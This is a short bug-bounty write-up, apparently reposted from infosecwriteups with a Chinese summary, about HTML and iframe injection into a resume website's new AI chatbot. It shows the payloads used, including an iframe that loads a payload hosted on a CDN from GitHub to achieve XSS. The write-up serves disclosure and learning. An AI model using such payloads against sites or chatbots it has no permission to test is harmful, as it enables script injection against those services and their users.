My first bounty from Hackerone | $100 Code Injection on AI bot
用户向简历网站报告重复错误后加入HackerOne计划,在AI功能上线后成功进行HTML注入和XSS攻击。 2026-1-6 05:12:0 Author: infosecwriteups.com(查看原文) 阅读量:2 收藏

StvRoot

Another story time. Eh!

I found a very popular website which people use it to make resumes. I mailed them a bug (duplicate) and in reply they added me to their hackerone programme.

This was in September.

I tested it for days but nothing. Being an old programme all the corners were checked multiple times already.

On 16 th of December I got a mail saying an AI feature was introduced. I didnt pay much attention as I doubted my skills plus I was testing another one. After 30–45 mins something snapped and I started to throw paylaods at the AI bot :)

When I tested for html injection :

<h1>a</h1>
<iframe src="https://google.com"></iframe>

Iframe Injection worked. Then I used jsdelivery cdn to host my payload on github and embeded it in an iframe to get XSS.

Press enter or click to view image in full size

 <iframe src="https://cdn.jsdelivr.net/gh/ScarryParrot/testing@3XXXXXXc20/payload9.pdf"></iframe>

Although I was in a doubt it being accepted as it do not affect any other users.


文章来源: https://infosecwriteups.com/my-first-bounty-from-hackerone-100-code-injection-on-ai-bot-620a7e3f2ba4?source=rss----7b722bfd1b8d--bug_bounty
如有侵权请联系:admin#unsafe.sh